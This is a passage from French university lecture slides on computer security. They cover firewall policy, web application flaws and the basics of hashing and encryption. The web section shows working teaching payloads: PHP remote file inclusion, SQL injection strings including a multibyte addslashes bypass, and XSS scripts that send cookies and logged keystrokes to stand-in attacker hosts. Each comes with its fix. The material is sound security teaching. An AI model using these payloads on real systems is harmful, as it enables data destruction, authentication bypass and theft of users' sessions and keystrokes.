Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 112 / 229
Mais on a des instances pour nous protéger
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 113 / 229
Ouais, mais on s’en fout c’est virtuel
Mon mot de passe de messagerie, je m’en fous. Tout ça c’est quedu virtuel.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 114 / 229
Les plus dangereuses fuites de données : Marriott
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 115 / 229
Les plus dangereuses fuites de données : police
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 116 / 229
Pourquoi dans le désert Irakien on voit ça ?
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 117 / 229
Que du virtuel hein ?
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 118 / 229
Que du virtuel hein ?
Un mort à cause d’un ransomware dans un hopital
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 119 / 229
Heureusement
On peut repérer les pirates quand ils cherchent des failles.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 120 / 229
Shodan, Censys, Zoomeye etc.
http://www.shodan.iohttps://censys.iohttps://www.zoomeye.org
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 121 / 229
Résolution des problèmes
La tronçonneuseLe ciseau à boisLe papier de verreLa lazure
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 122 / 229
La tronçonneuse
On enlève l’inutile :Protection contre l’extérieur;Protection contre l’intérieur;Protection à l’intérieur.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 123 / 229
Protection contre l’extérieur
Travail effectué par le firewall :On bloque tout ce qui vient de l’extérieur;Hormis ce qui est spécifiquement autorisé;Le tout basé sur une notion de port;Les entrées sont limitées en rapidité;On jette et on n’avertit pas.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 124 / 229
Protection contre l’intérieur
Tout est autorisé en sortie SAUFCe qui est offert en interne
DNS, SMTP, NTP, etc.Ce qui est dangereux pour l’extérieur
SNMP, Netbios, etc.Ce qui est illégal, non productif
P2P, pédopornographieJeux en ligne, pornographie
Les "zones ouvertes" qui doivent être contrôléesShow RoomWiFi
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 125 / 229
Protection à l’intérieur
Travail effectué par un filtrage interne. Tout est autorisé enintra-établissement SAUF
Ce qui est dangereuxLes zones ouvertesLes zones fragiles doivent être injoignables
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 126 / 229
Le ciseau à bois
On enlève ce que l’on sait dangereux dans ce qui est autoriséLe courrier électroniqueLe WebLes services en général
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 127 / 229
Le courrier électronique
Le SMTP rentre maisIl ne rentre pas pour ressortirIl ne doit pas être vecteur de virusIl est analysé contre le spam (ou plutôt contre tout danger).
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 128 / 229
Le Web
Le Web sort maisCertains sites sont interditsLes nids à virus sont inspectésOn journalise ce qui passe
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 129 / 229
Les services
Certains services sont offerts, maisLes serveurs sont patchésIls remontent les anomaliesUn détecteur d’anomalies veilleOn limite les conséquences des anomalies
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 130 / 229
Le reste
Le reste sort maisLimitation des débitsOn suit les connexions (journaux)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 131 / 229
Le papier de verre
On repère ce qui va être dangereux
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 132 / 229
Les logs sont nos amis
Les journaux sont nos seuls amis. On va donc faire appel à euxpour
Les machines internes qui déclenchent des alertes.Les services qui sont auscultés par l’extérieurLes alertes récurrentes
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 133 / 229
Les actions de salubrité publique
On abat les webmestres !
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 134 / 229
La lazure
On évite que le temps et les intempéries ne nous détruisent lamaison.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 135 / 229
La machine à remonter le temps
On fait des sauvegardesOn vérifie qu’elles fonctionnentOn ne les place pas au même endroit que les serveursOn vérifie qu’elles pourront toujours fonctionner
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 136 / 229
La dynamo
On met en place la dynamoE.D.F. en temps de paix : 240 VoltsE.D.F. en temps de grève : 0 VoltE.D.F. en temps d’orage : 400 Volts
L’onduleur est votre ami. Vous devez l’écouter.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 137 / 229
On ferme à clé
Coût d’un pirate professionnel: 2000 e à 200 000 eCoût d’une femme de ménage : 100 e la journée
Moralité : fermez les portes.
Post scriptumTemps moyen pour fracturer une serrure de sécurité "simple" : 3 à30 secondes.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 138 / 229
Les actions de salubrité publique
On abat les webmestres !
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 139 / 229
Préservation des webmestres
Directive ministérielle du 17 juillet 2003 Suite à une pression desécologistes, le tir aux webmestres n’est plus autorisé, même endehors des périodes de reproduction.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 140 / 229
Constats
Le web est exposé aux piratesLes erreurs sont faciles à faire, et lourdes de conséquences.
cible directe,vol de données des clients,infection simple des clients,infection ciblée des clients (point d’eau),flashmob DDOS.
Le web est marketingement correct.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 141 / 229
Solutions
Programmer correctementLes variables
Spécialiser la protectionModules spécialisésmod-securityReverse-proxy
Authentifier, chiffrerCertificats / chiffrement
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 142 / 229
Les applications web
Les failles d’un site web.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 143 / 229
Problème générique des failles
Les failles sont dues à l’utilisation imprévue d’une variable pourobtenir un comportement inattendu, mais contrôlé, plus ou moinscorrectement, par le pirate.La plupart des intrusions sur des sites web, contrairement à ce quemontre le cinéma, sont dûes à l’utilisation de failles de sécurité.Les serveurs web étant souvent les seuls points accessibles, voyonscomment cela peut se passer.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 144 / 229
Structure d’un service web
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 145 / 229
20 points de vulnérabilités
Du schéma précédent, on peut trouver 20 points de vulnérabilités :Les logiciels
Les serveursLes scriptsLes modulesLes outils de protection (antivirus, antispyware, etc.)
Les OSLes matérielsLes communicationsL’utilisateurLes protocoles
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 146 / 229
Les types de paramètres
Variables GET. Elles sont données dans l’URL de demande.Variables POST. Fournies par un formulaire.Variables Cookies. Variables conservées par le navigateur surson disque dur et généralement fournies par le serveur.Variables SERVER (HTTP_USER_AGENT ouHTTP_REFERER)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 147 / 229
Les variables GET
Décrites dans l’URL.http://www.google.com/search?p=html&hl=fr.Ici 2 variables p et hl, avec les valeurs html et fr.Généralement provenant d’une interrogation directe.Dans le cas présent, plutôt rare, il s’agit d’envoi par formulaire(method=GET).
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 148 / 229
Les variables POST
Remplies par un formulaire.Utilisées quand on a un grand volume de données à envoyer.Utilisées quand on a un grand nombre de variables.Non tracées par les journaux des daemons (hormis modulesspécifiques).Traitement particulier des variables Hidden qui sont cachéespour l’utilisateur, mais pas pour le navigateur.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 149 / 229
Les variables cookies
Notion de valise de variables stockées sur le clientTransmises de manière transparente dans la requêteC’est le serveur qui est sensé positionner ces variables pourune durée limitéeUn serveur ne peut généralement (sauf faille de sécurité)demander à accéder qu’aux variables :
Qu’il a lui-même positionnées.Qu’une machine de son domaine a positionnées (et si celle-cil’a explicitement autorisé).
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 150 / 229
Les variables SERVER
Ces variables sont hétéroclites.Celles que seul le serveur connait
Version du serveurRépertoire de travail
Celles qui sont associées à la connexionL’adresse du client REMOTE_ADDRL’hôte appeléLe port source
Celles qui proviennent du clientLe Referer : HTTP_REFERERLe USER_AGENTL’URL appelée
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 151 / 229
MUV : principe fondamental
Ces variables proviennent en majorité du client.Il a donc tout pouvoir pour les modifier, effacer.Les contrôles Javascript sont exécutés par le client ( s’il lesouhaite ! ).Les contrôles de formulaire (taille, type) sont exécutés par leclient ( s’il le souhaite ! ).
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 152 / 229
MUV : Généralisation : Injection de code
Faille de sécurité : faire exécuter du code informatiqueCe code va être injecté par une "interface" pas prévue pourCe code dépend de qui va l’éxecuter et du vecteur d’injection
Nom Langage Vecteur Interpréteur/VictimeBuffer Overflow Assembleur Binaire ProcesseurSQL Injection SQL web SGBDLDAP Injection LDAP web annuaire LDAPInjection shell, DOS, etc. web Interpréteur backofficeXSS Javascript web navigateurCSRF HTML web navigateurscript PDF Javascript PDF lecteur PDF
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 153 / 229
MUV : Quelques exemples
Variables sur les noms de fichier (ou les répertoires)Variables dites superglobalesVariables dans les requêtes SQL (ou LDAP ou toutinterpréteur)Variables pour du XSS
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 154 / 229
MUV : Sur les noms de fichiers
Exemple d’inclusion.
Soit le programme PHP suivant<?include ("header.inc");$page=$_GET[’page’]; # On récupère la variable "page"include ($page);include ("footer.inc");?>
que l’on utilise de la manière suivante
Utilisationhttp://192.168.30.72/mep.php?page=toto.txt
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 155 / 229
MUV : Sur les noms de fichiers
Quelques attaques :
Exemples simples d’utilisation malveillantehttp://192.168.30.72/mep.php?page=/etc/passwdhttp://192.168.30.72/mep.php?page=https://dsi.ut-capitole.fr/creufophacker.inc
On pourrait de la même manière utiliser les fonctions fopen,require, etc.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 156 / 229
MUV :Solution
Refuser les requêtes avec des caractères dangereux<?If (eregi("/",$page)){die("Va jouer dans le mixer !")}include ("header.inc");include ($page);include ("footer.inc");?>
On doit aussi utiliserLa notion de "allow_url_fopen" et "allow_url_include" duphp.ini en les mettant à faux,La notion de "open_basedir" en listant les répertoires autorisésEmpêcher l’utilisateur apache de sortir (avec un firewall ensortie), on pourra aussi bloquer MySQL et proftpd.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 157 / 229
MUV : Les injections SQL (ou LDAP)
Le SQL est un langage d’interrogation de base de données. C’estun véritable langage de programmation, avec ses fonctions, sesvariables, ses commentaires.Le principe des appels SQL en WWW, est que le langage (PHPpar exemple) crée une chaine de caractères (la commande SQL)qui est ensuite envoyée au SGBD.Le SGBD interprète et exécute le programme envoyé.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 158 / 229
MUV : Les injections SQL ou LDAP
Utilisationhttp://192.168.30.72/test_sql.php?id=3
Code du programme$id=$_GET[’id’];$sql_query="DELETE FROM matable WHERE id=$id";mysql_connect($database);mysql_query($database,$sql_query);
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 159 / 229
MUV : Les injections SQL première attaque
Les espaces doivent être remplacés par %20 en cas de GEThttp://192.168.30.72/test_sql.php?id=3 OR 1=1
ce qui nous donne
Chaine envoyée au SGBDDELETE FROM matable WHERE id=3 OR 1=1
Le résultat est la destruction de tous les enregistrements.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 160 / 229
MUV : Les injections SQL 1bis
Code du programme<?$id=$_GET[’id’];$sql_query="DELETE FROM matable WHERE id=$id AND user=’USER1’";mysql_connect($database);mysql_query($database,$sql_query);?>
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 161 / 229
MUV : Les injections SQL attaque 1bis
On ajoute un commentairehttp://192.168.30.72/test_sql.php?id=3 OR 1=1 --
ce qui nous donne :
Chaine envoyée au SGBDDELETE FROM matable WHERE id=3 OR 1=1 -- AND champ1=true
Le résultat est la destruction de tous les enregistrements, car la findu WHERE n’est pas prise en compte.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 162 / 229
MUV : Les injections SQL attaque 1ter
Un commentaire peut suffirehttp://192.168.30.72/[email protected] --
ce qui nous donne :
Chaine envoyée au SGBDSELECT uid FROM user WHERE [email protected] -- AND password=
Le résultat est une identification sans mot de passe.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 163 / 229
MUV : Les injections SQL attaque 1ter
Même chose avec un formulaire
ce qui nous donne :
Chaine envoyée au SGBDSELECT uid FROM user WHERE [email protected] -- AND password=
Le résultat est une identification sans mot de passe.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 164 / 229
MUV : Les injections SQL première solution
La première solution peut consister à modifier le programme enajoutant des quotes
Code du programme$sql_query="DELETE FROM matable WHERE id=’$id’";
Le résultat de la première attaque devient alors
Code du programmeDELETE FROM matable WHERE id=’3 OR 1=1’
qui est sans danger.Mais pourtant une faille existe encore
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 165 / 229
MUV : Les injections SQL deuxième attaque
Insérons une quotehttp://192.168.30.72/test_sql.php?id=3’ OR 1=1 --
ce qui nous donne
Chaine envoyée au SGBDDELETE FROM matable WHERE id=’3’ OR 1=1 -- ’
Le résultat est encore la destruction de tous les enregistrements.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 166 / 229
MUV : Les injections SQL deuxième solution
La solution va passer par 2 possibilitésle magic_quotes_gpc à on (ATTENTION : les versions dePHP influent !)la fonction addslashes (idem)
Code du programme$id=add_slashes($id);$sql_query="DELETE FROM matable WHERE id=’$id’";
L’attaque précédente donne alors
Chaine envoyée au SGBDDELETE FROM matable WHERE id=’3\’ OR 1=1’
Qui ne fait plus rien. Mais ce n’est toujours pas fini. Une failleexiste malgré cela.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 167 / 229
MUV : Les injections SQL troisième attaque
Le but de magic_quotes_gpc est à ON. Mais il a des problèmesavec les caractères dits "multibytes" : c’est à dire les alphabetsplus complexes (chinois par exemple)A la place de la quote, plaçons le caractère multibyte ’0xbf27’ .Cela ne peut réellement se faire que par un script :
Parlons chinois$id=chr(0xbf).chr(0x27)." OR 1=1";fopen(http://192.168.30.72/test_sql.php?id=$id)";
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 168 / 229
MUV : Les injections SQL troisième attaque
Le PHP reçoit un caractère multibyte chinois 0xbf27Il l’envoie à addslashes (ou à magic_quotes_gpc, ce qui estidentique)Celui-ci ne comprenant pas que c’est un caractère multibytes,croit voir 2 caractères : 0xbf et 0x27 qui est une quote. Ilajoute à 0x27 un antislash (0x5c).La chaine renvoyée à PHP est donc 0xbf5c27.Comme PHP renvoie à MySQL qui lui comprend le multibyte(si la BD est en UTF8), et que 0xbf5c est un caractèrevalide, il nous reste 0x27 qui est... la quote.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 169 / 229
MUV : Les injections SQL troisième attaque
On obtient alors la chaine suivante :Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3 ’ OR 1=1’
Le résultat est encore la destruction de tous les enregistrements.Solutions :
mysql_real_escape_string().les requêtes préparées.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 170 / 229
Et si c’était possible ?
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 171 / 229
Et bien si en fait !
Je fais le malin.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 172 / 229
MUV : Les variables de session
Les variables de session permettent de mettre les variableshabituellement mises en cookies, uniquement sur le serveur
Cela évite de trimbaler beaucoup d’informations.On n’a plus à les contrôler à chaque fois (elles ne sont plusmodifiables).
Seule reste une variable dans le cookie : celle qui contient lenuméro de session. En général, cette variable est équivalente à unidentifiant (on ne réauthentifie plus la personne).Pour un pirate, c’est le cookie à obtenir.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 173 / 229
MUV : Voler un cookie : Attaque
Soit un forum avec une zone de texte quelconque.
Si on saisitSalut les potes, le cours est génial, le prof est <B>super</B>.Reviendez....
On obtient doncSalut les potes, le cours est génial, le prof est super.
Reviendez....
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 174 / 229
MUV : Voler un cookie : Problème
Et si on saisit ?<script>while (1)alert("Vas téter la prise électrique");</script>
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 175 / 229
MUV : Voler un cookie : Problème
Soyons plus méchant :
Récupérons le cookie<script>cookie=document.cookie();i=new image();i.src="http://www.pirate.com/?id="+cookie;</script>
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 176 / 229
MUV : Voler un cookie : Solution
Bloquer la chaine "<script" dans les messages.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 177 / 229
MUV : Voler un cookie : Vraiment la solution ?
Comment s’écrit script ?"<script""<javascript""<JAVAscript""<java script""<javascript
et ça ?<cript>
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 178 / 229
MUV : Pire encore ?
un javascript s’appelle aussi par
Par erreur<img src=Y onerror="document.location= ’http://pir.com/vol?ck=’+document.cookie">
Spécifique IE<bgsound onpropertychange="code Javascript">
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 179 / 229
MUV : XSS = solution globale
Il faut utiliser sur toutes les variables externesGET, POST,HTTP_REFERER, HTTP_USER_AGENTdans les Cookies (même si on les a déjà contrôlées)
la fonction htmlentities().
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 180 / 229
MUV : XSS = vol de cookie ?
Ce n’est qu’une possibilité, par la transformation du navigateur.Mais en quoi ?
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 181 / 229
En outil de DOS HTTP : JS-LOIC
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 182 / 229
Et moi ?
<script language="javascript">var keys=’’;document.onkeypress = function(e) {
get = window.event?event:e;key = get.keyCode?get.keyCode:get.charCode;key = String.fromCharCode(key);keys+=key;
}window.setInterval(function(){
new Image().src = ’http://hack.com/keylogger.php?c=’+keys;keys = ’’;
}, 1000);</script>
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 183 / 229
Et si on intégrait tout ça ?
http://www.beefproject.com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 184 / 229
Un constat difficile
Un constatbeaucoup d’applications sont livrées "telles quelles"il y a souvent un historique lourdles applications sont "mouvantes".les développeurs ne sont pas souvent formés.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 185 / 229
Des solutions globales
D’où des solutions "globales"des IPS réseau pour bloquerdes modules de sécurité
en négatif : mod_security (apache)en positif : naxsi (nginx)parfois directement sur le serveur à protégersouvent utilisés en reverse-proxy.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 186 / 229
Le chiffrement
Le Chiffrement
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 187 / 229
Le chiffrement
Les condensats (Hash)La signatureLe chiffrement symétriqueLe chiffrement asymétriqueLes certificats
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 188 / 229
Hashage : définition
Transformation d’une suite d’octets de longueur généralementquelconque en une suite de longueur finie,Souvent appelé "condensat",Génère une "empreinte" pseudo-unique,Cette opération est constante (même fichier, même hash),Cette opération est non réversible.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 189 / 229
Hashage : utilité
Le "Hash" est utilisé pour garantir l’intégrité des donnéesIl permet de vérifier l’égalité d’un mot de passe, sans enconserver l’originalUne petite modification du fichier original donne une grandevariation du Hash (généralement)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 190 / 229
Exemples de Hashage
Le crypt unix"password" → "5GKtdsqlkgy"
Le CRC (Compute Redondancy Check)le sum unix
SHA-1 (Shamir)MD5 (Rivest)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 191 / 229
Hash de mot de passe : bcrypt et argon2
à réserver aux de mots de passe : ils sont très longsmême les mots de passe "simples" deviennent coûteux àcasser.bcrypt
c’est le standard actuelbasé sur blowfish
argon2a gagné le concours 2015 du meilleur algo de hash de mot depasse2 versions : l’une résiste mieux au GPU, l’autre aux"side-channels".
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 192 / 229
Hashage : utilisation pour les mots de passe
Génération :Alice choisit son mot de passe M1Le système "hashe" M1 pour obtenir HASH1Le système ne conserve que HASH1
UtilisationAlice se reconnecte, en tapant le mot de passe M2(normalement identique à M1)Le système hashe M2 et obtient HASH2Si HASH2=HASH1 alors M2=M1, donc OKOption : on peut ajouter un "sel" pour complexifier lecraquage des mots de passe.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 193 / 229
Vocabulaire
Coder : rendre inintelligible une information à l’aide d’un codeDécoder : rendre intelligible une information préalablementcodée à l’aide de la cléDécrypter : décoder mais sans le codeChiffrer=coderCrypter : en théorie n’existe pas
Pour plus d’information:http://michel.arboi.free.fr/cryptFAQ/
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 194 / 229
Pièges du chiffrement
Un chiffrement sans clé est un mauvais chiffrementUn chiffrement "fermé" est un mauvais chiffrementFaire un bon chiffremernt est compliquéUn bon chiffrement "théorique", s’il est mal appliqué devientun mauvais code (exemple du chiffrement WEP pour le Wi-Fi)Réutiliser une clé fragilise plus ou moins le processus dechiffrement.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 195 / 229
Chiffrement symétrique
Les clés de chiffrement et de déchiffrement sont identiquesLes algorithmes de chiffrement et déchiffrement ne sont pasforcément identiques.Pour communiquer il faut que Alice et Bob soient tous les 2au courant de la clé, ce qui signifie un échange préalable
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 196 / 229
Chiffrement symétrique
Alice
Bob
Cléde
Chiffrement
Algorithmede
chiffrementAlgorithme
dedéchiffrement
Message chiffréMessage
Message
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 197 / 229
Chiffrement symétrique : exemples
Exemples à transpositionCode de VigenèreXOR
Exemples à permutationDES (64 bits), et triple DES (3DES)IDEAAES (actuel standard de l’armée US)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 198 / 229
Chiffrement symétrique : caractéristiques
Les chiffrements et déchiffrements sont rapidesLeur décryptage peut être très long
64 bits = 8 octets = 1,8 x 1019 possibilitésà 1 million de tests par seconde1,8 x 1013 secondes soit 5800 siècles
AES est disponible en version 128,192 et 256 bits
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 199 / 229
Chiffrement symétrique : DES
Ancien standard56 bits (64 - 8 réservés à la parité)version renforcée : le triple DES, mais à 2 clés. Efficacité de113 bitsBloc de permutation de 64 bits
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 200 / 229
Chiffrement symétrique : AES
http://www.securiteinfo.com/crypto/aes.shtml
Nouveau standard (il s’appellait Rijndael à l’origine après unconcours de la NSA)Auteurs Rijmen et DaemenPlusieurs versions de 128,192 ou 256 bitsPlus rapide que DES (il ne travaille qu’avec des entiers)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 201 / 229
Chiffrement asymétrique
On génère 2 clés inter-dépendantes appeléesclé publique (qui a vocation à être largement distribuée)clé privée (qui doit absolument être protégée)
Ce qui est chiffrée par l’une est déchiffrable par l’autre, etuniquement elle !Il est mathématiquement impossible, dans des temps"humains" de déduire une clé depuis l’autre.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 202 / 229
Chiffrement asymétrique
Bob
Alice
Message chiffré
Algorithmede
déchiffrement
Publicationsur Internet
Clé publiquede Bob
Générationdu bi-clé
Clé privéede Bob
Clé publiquede Bob
Message
Algorithmede
chiffrementMessage
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 203 / 229
Chiffrement asymétrique : avantages
La clé publique est ... publiqueOn peut signer les messages avec ce chiffrement (cf la suite)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 204 / 229
Chiffrement asymétrique : inconvénients
Le chiffrement est moins résistant (2048 bits RSA = 128 bitsAES),Il est plus sensible aux progrès mathématiques,Il est beaucoup plus lent (puissance CPU occupée de 50 à 100fois plus importante)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 205 / 229
Chiffrement asymétrique : exemples
MéthodesR.S.A.Diffie HelmannEl Gamal (logarithme discret)Courbes elliptiques
OutilsPGPGPGOpenssl
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 206 / 229
Chiffrement asymétrique : PGP
Pretty Good PrivacyAuteur : Phil R. ZimmermannBasé sur RSANotion d’anneau de confianceA l’origine du standard OpenPGP (RFC 2440)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 207 / 229
Chiffrement asymétrique : GPG
GNU Privacy GuardLogiciel libreCompatible avec PGPhttp://www.hsc/ressources/breves/gpg.html
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 208 / 229
Chiffrement asymétrique : RSA
Auteurs : Rivest, Shamir et AdelmanBasé sur la factorisation de nombres premiersLe plus connu des chiffrements asymétriques
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 209 / 229
Chiffrement : réalité
Chiffrement asymétrique est lent, et le chiffrement symétriqueinutilisableD’où l’idée
On échange des clés de session symétriques en les codant avecun chiffrement asymétriquePuis on décode en symétrique
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 210 / 229
Cassage de clé : en 1995
Qui budget Moyen Temps Coût Clé sûreHacker de passage 0,00 € ordinateur 1 semaine 45Hacker de passage 400,00 € FPGA 5 heures 8 cents 50Petite entreprise 10.000,00 € FPGA 12 minutes 55Service moyen 300.000,00 € FPGA 24 secondes 60Grosse entreprise 10.000.000,00 € FPGA 0,7s 65Grosse entreprise 10.000.000,00 € ASIC 5 ms 0,1 cents 70NSA,DCRI,GRU 300.000.000,00 € ASIC 0,2ms 0,1 cents 75
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 211 / 229
Cassage de code : décryptage
La puissance processeur double tous les 18 mois (loi de Moore)Progrès mathématiques sur les chiffrements asymétriques :rapidité doublée tous les 18 mois avec des sauts sporadiquesBudget d’un attaquant double tous les 10 ansActuellement (http://hashcat.net) pour une AMD 7970(150 €)
8,5 milliards de MD5 par seconde416 Millions de SHA512 par seconde179 Millions de SHA-3 par seconde141000 WPA2 par seconde
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 212 / 229
Cassage de clé : évolution
La vision en 2001 :1982 1992 2002 2012 2022 2032
symétrique 56 64 72 80 87 95RSA/log discret 417 682 1028 1464 1995 2629DSS 102 114 127 141 154 168Courbes elliptiques 135 149 164 179
La recommandation actuelle en 2017 du BSI (Allemand)128 bits pour du symétrique2000 bits pour du RSA250 bits pour de l’elliptique et de l’algorithme discretRéférence : EPFL 2001Référence : keylength
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 213 / 229
Chiffrement asymétrique : Signature
La signature est la garantiede l’identité de l’expéditeur du messagede l’intégrité du message
